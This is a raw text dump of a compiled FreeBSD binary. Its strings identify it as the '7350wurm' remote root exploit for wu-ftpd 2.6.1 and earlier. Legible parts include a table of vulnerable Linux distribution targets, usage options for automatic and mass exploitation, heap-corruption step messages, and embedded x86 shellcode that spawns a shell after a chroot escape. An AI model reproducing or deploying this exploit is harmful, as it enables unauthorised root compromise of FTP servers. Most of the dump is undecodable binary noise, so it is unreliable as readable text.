ELF FreeBSD4PW4 (444GOGO`O```T/usr/libexec/ld-elf.so.1FreeBSD%7) 4%$5-+3#,16(2.    ! "'*&0/ @P1`!p)2=:8FMT}ZaЉkkry 0$0B@P*` ` pmrЊVd"&)0l> D pK0dV8l@[qPx`p libc.so.4strcpyprintfconnectmemmove_DYNAMIC__srget__inet_addrmemcpyperrorsleepoptargvsnprintfsocketselectfflushbzerosend_initcallocwriteenvironfprintfstrcat__deregister_frame_infooptind__prognamestrstr__errorreadstrncmpmemcmp__sFsscanfstrdupgettimeofdaygetoptmemsetgethostbyname_finiatexitgetsockopt_GLOBAL_OFFSET_TABLE_exitstrlenstrchrfcntl__register_frame_infoclosefree_etext_edata__bss_start_endend "DHLPTX\ ` d h lptx| !#$%'()+,012356WJ(5<%@%Dh%Hh%Lh%Ph%Th %Xh(%\h0%`h8p%dh@`%hhHP%lhP@%phX0%th` %xhh%|hp%hx%h%h%h%h%h%h%h%hp%h`%hP%h@%h0%h %h%h%h%h%h%h%h%h %h(U WVSҍu^|=~)}t#E`8t8/u H `@8ut R&hWVSPU=hu@vdd@Сd8ut h$shÍvUUthh$_sÐUUEPhh8hh8shh8^jAÉU8EEhh8E U}EP^hrE PEPˆUuovU¿ƒ5>0EP4 % EPhPtEPvPhv|hhP@tEPIh hP tEPEPvkv=t= t EA= u7}t }"w)}thj}u$= uUЍ M=E;uEPU Rhhh=v+Phh8cjFvPh@h88PPPhhPPPPE}"hh8jh=t>h =}h =u PhD}uS= tJPE}uh  jh`=uEPEP =~2PhPPh= t Phh8k=t'Phh8GEPERh*%h<jjIEPB EPEP{h`hEPhhPEPjhPt,Phh8sjVvhS=ugh :PhEPhLj shijvhh@hEPhhEP jnvÉUhhEPh h@PEP j"P9E}tj"E@Pu1vPhh8jvEEE8"u EE=tPEPh(EE v E $vE=tEPh<Rh`Bh/)PPE P=t,􍅨PPPhh@P PhEPhh@PEP^ hEPhh@PEP- hEPhh@PEP hP v'h $UЃ vEE}v EPjEPEPU=tEPhEU)JM=tEPhZEE)EEM=tEPh(jEPEP2=tEPEPh EPjEP=t=hB =}h vÉUhOqhaEvUЍ<uUЍRE@Ph =t)UЍRh=~BUЍRUЍRhE-h sÉUEUЍ<uSvUЍREP3tUЍ  E듍v1ÉU VSE EDžE}hjPJEE9Er7vUM˅}4)  E뾉EU=tPhPhEPGhhPEPMvhjPnEE9Er7vUM˅}4)  E뾉=tPh SEPPh*EP~hhPEP}v)Ev}vEPjEP[^ÉU=tEPEPE Ph4EPjd‰ЉEEhLEPTEPUEEE;E|2Eƒu RTPEP!EŐhEPEE;E |>EPhEPhVhPEPE뺉EPvÉUEPjE P$hj0E PEPE PEPE P.U ‰UEHU 9UrEE@ EݐPPEHU +P&E P‰ÉU= t EvE@)ЍPUEPEPEPRh`h8a E E @E E E E E E E UJE UJE UJE UJE UE UE UE UÉUWVSv|E| p|}llxDžttx牽llp <1<jjj|PE@P |t]hPjE}hjEPPEPiE|M΃ƒhPEPmE}uhj$}}hMjEPPjCvX[^_ÐUSEEvE8ubE8uREU)ӃEPvB;E s,EPWPREPE@P`EE땐]ÍvU} uE EEPjE PjEHPE PEP 8EPPEPE Puv뚉ÉUjjEPjLE} 1svhjPjhPEP jhPvuhhPEPjhP:t%=tPhPE PhEPhjPjhPEP %jhPt%=tPhEPhEP+hjPzjhPEPljhPuhhPEP;jhPt%=tPh( vU}~EP61vÉU WV@󥤃EPEPhEE;EvvEU ЍPPhh8Eƒuhh8bEƒhh8=EEEE;Er2E URh h8Eăh8hh8h8rEvEƒEƒ)Љ‰UUEE}uTh#h8jEƒu}thh8Ch8M맍vh'h8EU‰UE;Er2E URh h8Eăh8khh8^_ÉUEPE}u2EP*E}u1EP UÉUlWVSEfE}u EE@EUfPjjEPR~E}u E P4UBuEPjjEPE}uEPE PjEPpE}uEPfdEjEPEPE}}%,8$tEP}uh`P|hPeE` `U艕Dž牽 <<E U艕Dž牽 <<EEEEPjP`PE@P E}u&EPzr<k}u [E`Mσƒu3EMσƒuE`MσƒEMσƒtbEEPEPhhEP }_<[}u%?U< 0EPjEPE}uU[^_ÉUEhjP@PE PhPjPPEPÉU$SEEPjE PjEPjEP}~qE‰))‰EUщ)Ӊ)щM)ȋUщ)Ӊ)щ9~ jEPzE}]jE PEPE}U5EE 8 u U"E E;Er v]ÍvUWVSDžpjjEPll PjEPttu hEPGEU `u}\\hDžddh牽\\` <1<E xDž|xPjjEPE@P ttuKlPjEPttu <tu EUM΃ƒt>lPjEPYttu RIGvlPjEPttu <H[^_ÐUE EEPU J9r EPPEPEPEP_EEPK)E EEE<u vEvEUEM }MEER;E r EEREERPEPEU )Ph+ EERgPEEREPEER+EEER )E EUˆEM EM )ʉÐUS(=(tvЃ;u[ÐUwunknown bannermanual valuesVersion wu-2.6.0(1) Tue Jun 27 10:52:28 PDT 2000Slackware 7.1Version wu-2.4.2-academ[BETA-18](1) Thu Oct 25 03:14:49 GMT 2001SuSE 7.3 wu-2.4.2 [wuftpd.rpm]Version wu-2.6.0(1) Thu Oct 25 03:14:33 GMT 2001SuSE 7.3 [wuftpd.rpm]Version wu-2.4.2-academ[BETA-18](1) Mon Jun 18 12:35:12 GMT 2001SuSE 7.2 wu-2.4.2 [wuftpd.rpm]Version wu-2.6.0(1) Mon Jun 18 12:34:55 GMT 2001SuSE 7.2 [wuftpd.rpm]Version wu-2.4.2-academ[BETA-18](1) Thu Mar 1 14:44:08 GMT 2001SuSE 7.1 wu-2.4.2 [wuftpd.rpm]Version wu-2.6.0(1) Thu Mar 1 14:43:47 GMT 2001SuSE 7.1 [wuftpd.rpm]Version wu-2.4.2-academ[BETA-18](1) Wed Sep 20 23:52:21 GMT 2000SuSE 7.0 wu-2.4.2 [wuftpd.rpm]Version wu-2.6.0(1) Wed Sep 20 23:52:03 GMT 2000SuSE 7.0 [wuftpd.rpm]Version wu-2.4.2-academ[BETA-18](1) Mon Jun 26 13:11:56 GMT 2000SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]Version wu-2.6.0(1) Mon Jun 26 13:11:34 GMT 2000SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]Version wu-2.6.0(1) Thu Oct 28 23:35:06 GMT 1999SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]Version wu-2.4.2-academ[BETA-18](1) Wed Aug 30 22:26:37 GMT 2000SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]Version wu-2.6.0(1) Wed Aug 30 22:26:16 GMT 2000SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]Version wu-2.6.1-18RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]Version wu-2.6.1-16RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]Version wu-2.6.0(1) Fri Jun 23 09:17:44 EDT 2000RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]Version wu-2.6.0(1) Fri Jun 23 09:22:33 EDT 2000RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]Version wu-2.4.2-academ[BETA-18](1) Mon Jan 18 19:19:31 EST 1999RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]Version wu-2.6.1(1) Sun Sep 9 16:30:24 CEST 2001Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]Version wu-2.6.1(1) Wed Jan 10 07:07:00 CET 2001Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]Version wu-2.6.1(1) Mon Jan 15 20:52:49 CET 2001Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]Version wu-2.6.1(1) Mon Jan 29 08:04:31 PST 2001Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]Version wu-2.6.0(1) Thu May 25 03:35:34 PDT 2000Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]Version wu-2.6.1(1) Sat Feb 24 01:43:53 GMT 2001Debian sid [wu-ftpd_2.6.1-5_i386.deb]Version wu-2.6.0(1) Thu Feb 8 17:45:47 CET 2001Debian potato [wu-ftpd_2.6.0-5.3.deb]Version wu-2.6.0(1) Fri Jun 23 08:07:11 CEST 2000Debian potato [wu-ftpd_2.6.0-5.1.deb]Version wu-2.6.0(1) Tue Nov 30 19:12:53 CET 1999Debian potato [wu-ftpd_2.6.0-3.deb]Version wu-2.6.1(1) Wed Nov 28 14:03:42 CET 2001Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]127.0.0.1ftpmozilla@usage: %s [-h] [-v] [-a] [-D] [-m] [-t ] [-u ] [-p ] [-d host] [-L ] [-A ] -h this help -v be verbose (default: off, twice for greater effect) -a AUTO mode (target from banner) -D DEBUG mode (waits for keypresses) -m enable mass mode (use with care) -t num choose target (0 for list, try -v or -v -v) -u user username to login to FTP (default: "ftp") -p pass password to use (default: "mozilla@") -d dest IP address or fqhn to connect to (default: 127.0.0.1) -L loc override target-supplied retloc (format: 0xdeadbeef) -A addr override target-supplied retaddr (format: 0xcafebabe) 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). hvaDmt:u:p:d:L:A:%uh0rausername = %s 0x%lxWARNING: target out of list. list: created argv-code too long (%d bytes) # created %d byte execve shellcode # trying to log into %s with (%s/%s) ... failed to connect (user/pass correct?) connected. DEBUG: press enter ???# banner: %s# failed to jield target from banner, aborting # successfully selected target from banner using %lu byte shellcode: shellcode# overriding target retaddr with: 0x%08lx # overriding target retloc with: 0x%08lx ### TARGET: %s # 1. filling memory gaps # 3. triggering free(globlist[1]) CWD ~{ sPexploitation FAILED ! output: %s # # exploitation succeeded. sending real shellcode # mass mode, sending constructed argv code # send. sleeping 10 seconds # success. # sending setreuid/chroot/execve shellcode %s# spawning shell ############################################################################ ЎЎЎЎЎЎЎЎЎhЎЎЎЎЎЎЎЎЎЎЎЎЎЎЎЎЎЎЎЎЎЎ\ЎЎЎЎЎЎЎ܍ЎЎLЎЎЎ$ЍPWD 257 faulty PWD reply: %s PWD path (%lu): %s dir_chunk_size = 0x%08lx # 2. sending bigbuf + fakechunk LIST xpbufCWD %s 550 CWD ~/{.,.,.,.} 250 CWD . ~/{.,.,.,.} bridge_dist = 0x%08lx padchunk_size = 0x%08lx fakechunk_size = 0x%08lx padchunk_size = 0x%08lx ==> %lu press enter num . description ----+------------------------------------------------------- %3d | %s : %s : retloc: 0x%08lx cbuf: 0x%08lx ' 7350: CWD %s | CWD %s CWD %s%c RNFR: %d x 0x%08x (%d) RNFR ./350 building chunk: ([0x%08lx] = 0x%08lx) in %d bytes read userconnection closed by foreign host. read remote220-220 %s USER %s 331 PASS %s 230-230 ................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~................................................................................................................................./* %s, %u bytes */ %02x | %c | [%3d/%3d] adding (%2d): %s 41C tQ -PjX̀1YjX̀3F3̀jTܰ'̀=̀Rh../Dܰ=̀XjTj(X̀_1PGWugHu[SPZ ̀3F3̀jTܰ'̀=̀Rh../Dܰ=̀XjTj(X̀j XRhn/shh//biRS̀8AAAABBBB8 @8 8@88@8.8+d@8&8P`F@8@+8@` 8H80Pe` 8 88`3` 8@8` 8 F8L1]P80,Y 8@88\@884q@8  8T`8h @84ѳ8  8@8 @8d`18,LVZ<FVfvƉ։&6FVfvƊ֊&6FVfv $ (  80܇GCC: (GNU) c 2.95.3 [FreeBSD] 20010315 (release)GCC: (GNU) c 2.95.3 [FreeBSD] 20010315 (release)GCC: (GNU) c 2.95.3 [FreeBSD] 20010315 (release)GCC: (GNU) c 2.95.3 [FreeBSD] 20010315 (release)01.0101.0101.0101.01.symtab.strtab.shstrtab.interp.note.ABI-tag.hash.dynsym.dynstr.rel.bss.rel.plt.init.plt.text.fini.rodata.data.eh_frame.ctors.dtors.got.dynamic.bss.comment.note#1((x7 p?G ܇P 0 Y$$ _00 pd &j1p1 x``O ~$$T((T00T88TTU@ UHVPV8[ 1 8d_(܇$0    ` $(08 $ d 0-h 9$ O$bx mw  l ( x x , $ 4$    @P1 `(p0 9B2 M X e pr z=Z 8Xb Z Ğ    }Љk  0$"Ĝ +H 30B:@@Hp UP*] k`r ̗ P?   A `  pm ~ rЊV+d7&>E J* X ` l9 t @I l  p0d8$ @[P   `  ܓ T .p4 JP Zcrtstuff.cgcc2_compiled.p.3__DTOR_LIST__completed.4__do_global_dtors_aux__EH_FRAME_BEGIN__fini_dummyobject.11frame_dummyinit_dummyforce_to_data__CTOR_LIST____do_global_ctors_aux__CTOR_END____DTOR_END____FRAME_END__7350wurm.csc_build_x86_lnxpasswordstrcpyprintfdestconnectmemmoveusername_DYNAMICxp_gapfillftp_escapex86_lnx_loopftp_bannernet_write__srget_etextnet_resolve__inet_addrhexdumpusageshellmemcpyverboseperrorshellcodedebugmodesleepoptargvsnprintfmcodesocketselectfflushbzerosend_initxp_buildtargetscallocwriteenvironxp_buildsizefprintfshellcode_lenstrcat__deregister_frame_infoendtgt_listnet_rtimeoutoptindmlennet_rlinet__progname_startstrstr__errorreadstrncmptgt_frombannermemcmpnet_connect__sFsscanfstrdupgettimeofday__bss_startgetoptmemsetmainxp_buildchunktmanualuser_retlocx86_wrxnet_conntimeoutx86_lnx_shellgethostbyname_finiatexitgetsockopt_edata_GLOBAL_OFFSET_TABLE__endftp_recv_untilexitstrlenmassuser_retaddrstrchrautomodeexploitx86_lnx_execvefcntl__register_frame_infocloseftp_loginfree